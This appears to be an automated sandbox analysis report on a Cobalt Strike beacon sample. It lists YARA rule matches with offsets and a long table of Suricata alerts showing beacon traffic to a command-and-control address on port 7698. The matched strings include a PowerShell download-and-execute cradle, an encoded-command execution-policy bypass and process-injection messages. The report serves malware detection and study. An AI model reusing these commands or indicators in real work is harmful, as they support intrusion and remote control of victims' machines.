0.2.2HSalvXIJE.exe.3a90000.1.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x31a8a:$s1: %%IMPORT%% 0x30f87:$s2: www6.%x%x.%s 0x30f7b:$s3: cdn.%x%x.%s 0x31203:$s4: api.%x%x.%s 0x31f70:$s5: %s (admin) 0x31272:$s6: could not spawn %s: %d 0x31b2e:$s7: Could not kill %d: %d 0x31347:$s8: Could not connect to pipe (%s): %d 0x30f94:$s9: %s.1%x.%x%x.%s 0x30fa3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3107e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x310c4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31138:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31161:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31186:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x311a7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x311c4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x311dd:$s9: %s.1%08x%08x.%x%x.%s 0x311f2:$s9: %s.1%08x.%x%x.%s
0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x32d6a:$a11: Could not open service control manager on %s: %d 0x3329c:$a12: %d is an x64 process (can't inject x86 content) 0x332cc:$a13: %d is an x86 process (can't inject x64 content) 0x335ed:$a14: Failed to impersonate logged on user %d (%u) 0x33255:$a15: could not create remote thread in %d: %d 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33203:$a17: could not write to process memory: %d 0x32d9b:$a18: Could not create service %s on %s: %d 0x32e24:$a19: Could not delete service %s on %s: %d 0x32c89:$a20: Could not open process token: %d (%u)
0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x334b2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x334fc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x3: %d is an x86 process (can't inject x64 content) 0x32c89:$s1: Could not open process token: %d (%u) 0x329a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s4: Could not connect to pipe (%s): %d
0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x41bf1:$loader_export: ReflectiveLoader 0x32960:$exportname: beacon.dll
0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3329c:$x2: %d is an x64 process (can't inject x86 content) 0x335ed:$x3: Failed to impersonate logged on user %d (%u) 0x334fc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x334b2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x32c0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x33203:$s4: could not write to process memory: %d 0x329a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s6: Could not connect to pipe (%s): %d
0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x33970:$str1: %s (admin) 0x32960:$str2: beacon.dll
0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x334fc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x2: %d is an x86 process (can't inject x64 content) 0x334b2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33596:$x4: Failed to impersonate token from %d (%u) 0x335ed:$x5: Failed to impersonate logged on user %d (%u) 0x329a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x3348a:$s1: %%IMPORT%% 0x32987:$s2: www6.%x%x.%s 0x3297b:$s3: cdn.%x%x.%s 0x32c03:$s4: api.%x%x.%s 0x33970:$s5: %s (admin) 0x32c72:$s6: could not spawn %s: %d 0x3352e:$s7: Could not kill %d: %d 0x32d47:$s8: Could not connect to pipe (%s): %d 0x32994:$s9: %s.1%x.%x%x.%s 0x329a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32ac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x32b38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x32ba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x32bc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x32bdd:$s9: %s.1%08x%08x.%x%x.%s 0x32bf2:$s9: %s.1%08x.%x%x.%s
Click to see the 18 entries

Suricata Signatures

ET MALWARE Cobalt Strike Beacon Observed

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-23T17:25:38.970068+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49706	79.124.58.130	7698	TCP
2024-10-23T17:25:39.967781+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49707	79.124.58.130	7698	TCP
2024-10-23T17:25:40.996158+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49708	79.124.58.130	7698	TCP
2024-10-23T17:25:42.007761+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49709	79.124.58.130	7698	TCP
2024-10-23T17:25:43.012519+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49710	79.124.58.130	7698	TCP
2024-10-23T17:25:44.025256+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49711	79.124.58.130	7698	TCP
2024-10-23T17:25:45.024263+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49712	79.124.58.130	7698	TCP
2024-10-23T17:25:46.035259+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49713	79.124.58.130	7698	TCP
2024-10-23T17:25:47.104754+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49714	79.124.58.130	7698	TCP
2024-10-23T17:25:48.111718+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49715	79.124.58.130	7698	TCP
2024-10-23T17:25:49.120499+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49716	79.124.58.130	7698	TCP
2024-10-23T17:25:50.115733+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49718	79.124.58.130	7698	TCP
2024-10-23T17:25:51.151556+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49720	79.124.58.130	7698	TCP
2024-10-23T17:25:52.151334+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49722	79.124.58.130	7698	TCP
2024-10-23T17:25:53.159459+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49723	79.124.58.130	7698	TCP
2024-10-23T17:25:54.174468+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49724	79.124.58.130	7698	TCP
2024-10-23T17:25:55.194523+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49725	79.124.58.130	7698	TCP
2024-10-23T17:25:56.198742+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49726	79.124.58.130	7698	TCP
2024-10-23T17:25:57.433355+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49727	79.124.58.130	7698	TCP
2024-10-23T17:25:58.445115+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49728	79.124.58.130	7698	TCP
2024-10-23T17:25:59.801063+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49729	79.124.58.130	7698	TCP
2024-10-23T17:26:00.814684+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49730	79.124.58.130	7698	TCP
2024-10-23T17:26:01.824560+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49731	79.124.58.130	7698	TCP
2024-10-23T17:26:02.853390+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49732	79.124.58.130	7698	TCP
2024-10-23T17:26:03.881706+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49733	79.124.58.130	7698	TCP
2024-10-23T17:26:04.894871+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49734	79.124.58.130	7698	TCP
2024-10-23T17:26:05.900810+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49735	79.124.58.130	7698	TCP
2024-10-23T17:26:06.912017+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49736	79.124.58.130	7698	TCP
2024-10-23T17:26:08.179524+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49737	79.124.58.130	7698	TCP
2024-10-23T17:26:09.248116+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49738	79.124.58.130	7698	TCP
2024-10-23T17:26:10.255790+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49739	79.124.58.130	7698	TCP
2024-10-23T17:26:11.324204+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49740	79.124.58.130	7698	TCP
2024-10-23T17:26:12.359042+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49741	79.124.58.130	7698	TCP
2024-10-23T17:26:13.360299+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49742	79.124.58.130	7698	TCP
2024-10-23T17:26:14.356397+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49743	79.124.58.130	7698	TCP
2024-10-23T17:26:15.357630+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49744	79.124.58.130	7698	TCP
2024-10-23T17:26:16.494346+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49745	79.124.58.130	7698	TCP
2024-10-23T17:26:17.505655+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49746	79.124.58.130	7698	TCP
2024-10-23T17:26:18.522596+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49747	79.124.58.130	7698	TCP
2024-10-23T17:26:19.570341+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49748	79.124.58.130	7698	TCP
2024-10-23T17:26:20.597842+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49749	79.124.58.130	7698	TCP
2024-10-23T17:26:21.602498+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49750	79.124.58.130	7698	TCP
2024-10-23T17:26:22.639247+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49751	79.124.58.130	7698	TCP
2024-10-23T17:26:23.660332+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49752	79.124.58.130	7698	TCP
2024-10-23T17:26:24.693927+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49753	79.124.58.130	7698	TCP
2024-10-23T17:26:25.699416+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49754	79.124.58.130	7698	TCP
2024-10-23T17:26:26.710638+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49755	79.124.58.130	7698	TCP
2024-10-23T17:26:27.702428+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49756	79.124.58.130	7698	TCP
2024-10-23T17:26:28.721261+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49757	79.124.58.130	7698	TCP
2024-10-23T17:26:29.741853+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49759	79.124.58.130	7698	TCP
2024-10-23T17:26:30.755425+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49760	79.124.58.130	7698	TCP
2024-10-23T17:26:31.769138+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49761	79.124.58.130	7698	TCP
2024-10-23T17:26:32.782094+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49762	79.124.58.130	7698	TCP
2024-10-23T17:26:33.797480+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49763	79.124.58.130	7698	TCP
2024-10-23T17:26:34.808584+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49764	79.124.58.130	7698	TCP
2024-10-23T17:26:36.383218+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49765	79.124.58.130	7698	TCP
2024-10-23T17:26:37.399087+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49766	79.124.58.130	7698	TCP
2024-10-23T17:26:38.433750+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49767	79.124.58.130	7698	TCP
2024-10-23T17:26:39.437139+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49768	79.124.58.130	7698	TCP
2024-10-23T17:26:40.442632+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49769	79.124.58.130	7698	TCP
2024-10-23T17:26:41.458635+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49770	79.124.58.130	7698	TCP
2024-10-23T17:26:42.475434+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49771	79.124.58.130	7698	TCP
2024-10-23T17:26:43.479443+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49772	79.124.58.130	7698	TCP
2024-10-23T17:26:44.485483+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49773	79.124.58.130	7698	TCP
2024-10-23T17:26:45.500311+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49774	79.124.58.130	7698	TCP
2024-10-23T17:26:46.504944+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49775	79.124.58.130	7698	TCP
2024-10-23T17:26:47.538919+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49776	79.124.58.130	7698	TCP
2024-10-23T17:26:48.531587+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49777	79.124.58.130	7698	TCP
2024-10-23T17:26:49.566807+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49778	79.124.58.130	7698	TCP
2024-10-23T17:26:50.580700+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49779	79.124.58.130	7698	TCP
2024-10-23T17:26:51.594679+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49780	79.124.58.130	7698	TCP
2024-10-23T17:26:52.623325+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49782	79.124.58.130	7698	TCP
2024-10-23T17:26:53.633985+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49783	79.124.58.130	7698	TCP
2024-10-23T17:26:54.642433+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49785	79.124.58.130	7698	TCP
2024-10-23T17:26:55.652251+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49786	79.124.58.130	7698	TCP
2024-10-23T17:26:56.696738+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49787	79.124.58.130	7698	TCP
2024-10-23T17:26:57.724368+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49788	79.124.58.130	7698	TCP
2024-10-23T17:26:58.789965+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49789	79.124.58.130	7698	TCP
2024-10-23T17:26:59.808899+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49790	79.124.58.130	7698	TCP
2024-10-23T17:27:00.825530+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49791	79.124.58.130	7698	TCP
2024-10-23T17:27:01.841569+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49792	79.124.58.130	7698	TCP
2024-10-23T17:27:02.863554+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49793	79.124.58.130	7698	TCP
2024-10-23T17:27:04.189468+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49794	79.124.58.130	7698	TCP
2024-10-23T17:27:05.201000+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49795	79.124.58.130	7698	TCP
2024-10-23T17:27:06.224172+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49796	79.124.58.130	7698	TCP
2024-10-23T17:27:07.227454+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49797	79.124.58.130	7698	TCP
2024-10-23T17:27:08.266186+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49798	79.124.58.130	7698	TCP
2024-10-23T17:27:09.269675+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49799	79.124.58.130	7698	TCP
2024-10-23T17:27:10.322900+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49800	79.124.58.130	7698	TCP
2024-10-23T17:27:11.345569+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49801	79.124.58.130	7698	TCP
2024-10-23T17:27:12.369328+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49802	79.124.58.130	7698	TCP
2024-10-23T17:27:13.371605+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49803	79.124.58.130	7698	TCP
2024-10-23T17:27:14.388676+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49804	79.124.58.130	7698	TCP
2024-10-23T17:27:15.432912+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49805	79.124.58.130	7698	TCP
2024-10-23T17:27:16.449580+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49806	79.124.58.130	7698	TCP
2024-10-23T17:27:17.601482+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49807	79.124.58.130	7698	TCP
2024-10-23T17:27:18.617676+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49808	79.124.58.130	7698	TCP
2024-10-23T17:27:19.655348+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49809	79.124.58.130	7698	TCP
2024-10-23T17:27:20.911521+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49810	79.124.58.130	7698	TCP
2024-10-23T17:27:21.921622+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49811	79.124.58.130	7698	TCP
2024-10-23T17:27:22.958194+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49812	79.124.58.130	7698	TCP
2024-10-23T17:27:23.970367+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49813	79.124.58.130	7698	TCP
2024-10-23T17:27:24.995454+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49814	79.124.58.130	7698	TCP
2024-10-23T17:27:26.027701+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49815	79.124.58.130	7698	TCP
2024-10-23T17:27:27.089596+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49816	79.124.58.130	7698	TCP
2024-10-23T17:27:28.115806+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49817	79.124.58.130	7698	TCP
2024-10-23T17:27:29.123579+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49818	79.124.58.130	7698	TCP
2024-10-23T17:27:30.385229+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49819	79.124.58.130	7698	TCP
2024-10-23T17:27:31.432189+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49820	79.124.58.130	7698	TCP
2024-10-23T17:27:32.472746+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49821	79.124.58.130	7698	TCP
2024-10-23T17:27:33.482633+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49822	79.124.58.130	7698	TCP
2024-10-23T17:27:34.493467+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49823	79.124.58.130	7698	TCP
2024-10-23T17:27:35.606173+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49824	79.124.58.130	7698	TCP
2024-10-23T17:27:36.626968+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49825	79.124.58.130	7698	TCP
2024-10-23T17:27:37.630738+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49826	79.124.58.130	7698	TCP
2024-10-23T17:27:38.650085+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49827	79.124.58.130	7698	TCP
2024-10-23T17:27:39.664723+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49828	79.124.58.130	7698	TCP
2024-10-23T17:27:40.698781+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49829	79.124.58.130	7698	TCP
2024-10-23T17:27:41.969457+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49830	79.124.58.130	7698	TCP
2024-10-23T17:27:42.985382+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49831	79.124.58.130	7698	TCP
2024-10-23T17:27:44.004370+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49832	79.124.58.130	7698	TCP
2024-10-23T17:27:45.002587+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49833	79.124.58.130	7698	TCP
2024-10-23T17:27:46.023594+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49834	79.124.58.130	7698	TCP
2024-10-23T17:27:47.030003+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49835	79.124.58.130	7698	TCP
2024-10-23T17:27:48.041715+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49836	79.124.58.130	7698	TCP
2024-10-23T17:27:49.042900+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49837	79.124.58.130	7698	TCP
2024-10-23T17:27:50.079596+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49838	79.124.58.130	7698	TCP
2024-10-23T17:27:51.102594+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49839	79.124.58.130	7698	TCP
2024-10-23T17:27:52.103525+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49840	79.124.58.130	7698	TCP
2024-10-23T17:27:53.098405+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49841	79.124.58.130	7698	TCP
2024-10-23T17:27:54.095582+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49842	79.124.58.130	7698	TCP
2024-10-23T17:27:55.111708+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49843	79.124.58.130	7698	TCP
2024-10-23T17:27:56.127798+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49844	79.124.58.130	7698	TCP
2024-10-23T17:27:57.402822+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49845	79.124.58.130	7698	TCP
2024-10-23T17:27:58.429740+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49846	79.124.58.130	7698	TCP
2024-10-23T17:27:59.437945+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49847	79.124.58.130	7698	TCP
2024-10-23T17:28:01.414962+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49848	79.124.58.130	7698	TCP
2024-10-23T17:28:02.440157+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49849	79.124.58.130	7698	TCP
2024-10-23T17:28:03.602837+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49850	79.124.58.130	7698	TCP
2024-10-23T17:28:04.599476+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49851	79.124.58.130	7698	TCP
2024-10-23T17:28:05.607702+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49852	79.124.58.130	7698	TCP
2024-10-23T17:28:06.622899+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49853	79.124.58.130	7698	TCP
2024-10-23T17:28:07.763719+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49854	79.124.58.130	7698	TCP
2024-10-23T17:28:08.786099+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49855	79.124.58.130	7698	TCP
2024-10-23T17:28:09.874412+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49856	79.124.58.130	7698	TCP
2024-10-23T17:28:10.898284+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49857	79.124.58.130	7698	TCP
2024-10-23T17:28:12.155030+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49858	79.124.58.130	7698	TCP
2024-10-23T17:28:13.211767+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49859	79.124.58.130	7698	TCP
2024-10-23T17:28:14.208634+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49860	79.124.58.130	7698	TCP
2024-10-23T17:28:15.433361+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49861	79.124.58.130	7698	TCP
2024-10-23T17:28:16.651853+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49862	79.124.58.130	7698	TCP
2024-10-23T17:28:17.702552+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49863	79.124.58.130	7698	TCP
2024-10-23T17:28:18.941917+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49864	79.124.58.130	7698	TCP
2024-10-23T17:28:19.971633+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49865	79.124.58.130	7698	TCP
